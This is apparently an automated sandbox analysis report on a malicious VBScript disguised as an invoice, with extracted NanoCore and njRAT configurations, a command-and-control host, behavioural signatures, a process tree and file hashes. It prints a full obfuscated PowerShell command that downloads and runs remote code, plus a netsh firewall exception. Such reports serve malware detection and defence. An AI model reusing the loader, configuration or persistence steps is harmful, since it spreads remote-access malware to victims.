Y1K3875FX_INV0ICE_RECEIPT.vbs

General
Target: Y1K3875FX_INV0ICE_RECEIPT.vbs
Filesize: 4KB
Completed: 14-01-2022 16:30
Score: 10/10
MD5: eabf87aa6e88a700b48fdc11fd56d034
SHA1: 02aa868a130881a5dc409a7d06d943f7ae7f0654
SHA256: a52cb2c09e66deb221d1db56e62b67138e5e3de516966481f789cd48dcacbe66

Malware Config

Extracted

Family nanocore
Version 1.2.2.0
C2: childhome4100.duckdns.org:4100

Attributes
activate_away_mode: true
backup_connection_host: childhome4100.duckdns.org
backup_dns_server: 8.8.4.4
buffer_size: 65535
build_time: 2021-10-26T14:02:15.903896736Z
bypass_user_account_control: true
bypass_user_account_control_data:
clear_access_control: true
clear_zone_identifier: false
connect_delay: 4000
connection_port: 4100
default_group: father of child
enable_debug_mode: true
gc_threshold: 1.048576e+07
keep_alive_timeout: 30000
keyboard_logging: false
lan_timeout: 2500
max_packet_size: 1.048576e+07
mutex: 915339bc-81e8-473d-98ef-3cba5bb4ebc8
mutex_timeout: 5000
prevent_system_sleep: false
primary_connection_host: childhome4100.duckdns.org
primary_dns_server: 8.8.8.8
request_elevation: true
restart_delay: 5000
run_delay: 0
run_on_startup: true
set_critical_process: true
timeout_interval: 5000
use_custom_dns_server: false
version: 1.2.2.0
wan_timeout: 8000

Extracted

Family njrat
Version 1.9
Botnet HacKed
Attributes
reg_key: Microsoft.Exe
Signatures 19

Defense Evasion
Discovery
Persistence
  • Detect Neshta Payload

    Reported IOCs

    resource | yara_rule
    behavioral2/memory/3864-144-0x00000000004080E4-mapping.dmp | family_neshta
    behavioral2/memory/3864-143-0x0000000000400000-0x000000000041B000-memory.dmp | family_neshta
    behavioral2/memory/3864-148-0x0000000000400000-0x000000000041B000-memory.dmp | family_neshta
  • Modifies system executable filetype association
    aspnet_compiler.exe

    TTPs

    Modify Registry, Change Default File Association

    Reported IOCs

    description | ioc | process
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | aspnet_compiler.exe
  • NanoCore

    Description

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Neshta

    Description

    Malware from the Neshta family is designed to infect other files in order to spread and cause damage.

  • njRAT/Bladabindi

    Description

    Widely used RAT written in .NET.

  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flow | pid | process
    20 | 536 | powershell.exe
    39 | 536 | powershell.exe
  • Modifies Windows Firewall

    TTPs

    Modify Existing Service
  • Checks computer location settings
    WScript.exe

    Description

    Looks up country code configured in the registry, likely geofence.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | WScript.exe
  • Adds Run key to start application
    aspnet_compiler.exe

    TTPs

    Registry Run Keys / Startup Folder, Modify Registry

    Reported IOCs

    description | ioc | process
    Set value (str) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe\" .." | aspnet_compiler.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe\" .." | aspnet_compiler.exe
  • Suspicious use of SetThreadContext
    powershell.exe

    Reported IOCs

    description | pid | process | target process
    PID 536 set thread context of 3812 | 536 | powershell.exe | aspnet_compiler.exe
    PID 536 set thread context of 3864 | 536 | powershell.exe | aspnet_compiler.exe
    PID 536 set thread context of 3304 | 536 | powershell.exe | aspnet_compiler.exe
  • Drops file in Program Files directory
    aspnet_compiler.exe

  • Drops file in Windows directory
    aspnet_compiler.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\svchost.com | aspnet_compiler.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Checks processor information in registry
    MusNotification.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | MusNotification.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | MusNotification.exe
  • Modifies registry class
    aspnet_compiler.exe

    Reported IOCs

    description | ioc | process
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | aspnet_compiler.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe, aspnet_compiler.exe

    Reported IOCs

    pid | process
    536 | powershell.exe
    3812 | aspnet_compiler.exe
  • Suspicious behavior: GetForegroundWindowSpam
    aspnet_compiler.exe

    Reported IOCs

    pid | process
    3812 | aspnet_compiler.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe, MusNotification.exe, aspnet_compiler.exe, aspnet_compiler.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 536 | powershell.exe
    Token: SeShutdownPrivilege | 2292 | MusNotification.exe
    Token: SeCreatePagefilePrivilege | 2292 | MusNotification.exe
    Token: SeDebugPrivilege | 3812 | aspnet_compiler.exe
    Token: SeDebugPrivilege | 3304 | aspnet_compiler.exe
    Token: 33 | 3304 | aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege | 3304 | aspnet_compiler.exe
  • Suspicious use of WriteProcessMemory
    WScript.exe, powershell.exe, aspnet_compiler.exe

    Reported IOCs

    description | pid | process | target process
    PID 3088 wrote to memory of 536 | 3088 | WScript.exe | powershell.exe
    PID 536 wrote to memory of 3812 | 536 | powershell.exe | aspnet_compiler.exe
    PID 536 wrote to memory of 4060 | 536 | powershell.exe | aspnet_compiler.exe
    PID 536 wrote to memory of 3864 | 536 | powershell.exe | aspnet_compiler.exe
    PID 536 wrote to memory of 3584 | 536 | powershell.exe | aspnet_compiler.exe
    PID 536 wrote to memory of 3304 | 536 | powershell.exe | aspnet_compiler.exe
    PID 3304 wrote to memory of 3248 | 3304 | aspnet_compiler.exe | netsh.exe
Processes 9
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Y1K3875FX_INV0ICE_RECEIPT.vbs"
    Checks computer location settings
    Suspicious use of WriteProcessMemory
    PID:3088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/vet/PS1NAIO.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN
      Blocklisted process makes network request
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:536
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        PID:3812
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        PID:4060
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Modifies system executable filetype association
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        PID:3864
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        PID:3584
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:3304
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
          PID:3248
  • C:\Windows\system32\MusNotification.exe
    C:\Windows\system32\MusNotification.exe
    Checks processor information in registry
    Suspicious use of AdjustPrivilegeToken
    PID:2292
Downloads
  • C:\PROGRA~3\314694~1\MICROS~1.EXE
    MD5: fda8c8f2a4e100afb14c13dfcbcab2d2
    SHA1: 19dfd86294c4a525ba21c6af77681b2a9bbecb55
    SHA256: 99a2c778c9a6486639d0aff1a7d2d494c2b0dc4c7913ebcb7bfea50a2f1d0b09
    SHA512: 94f0ace37cae77be9935cf4fc8aaa94691343d3b38de5e16c663b902c220bff513cd02256c7af2d815a23dd30439582ddbb0880009c76bbf36ff8fbc1a6ddc18
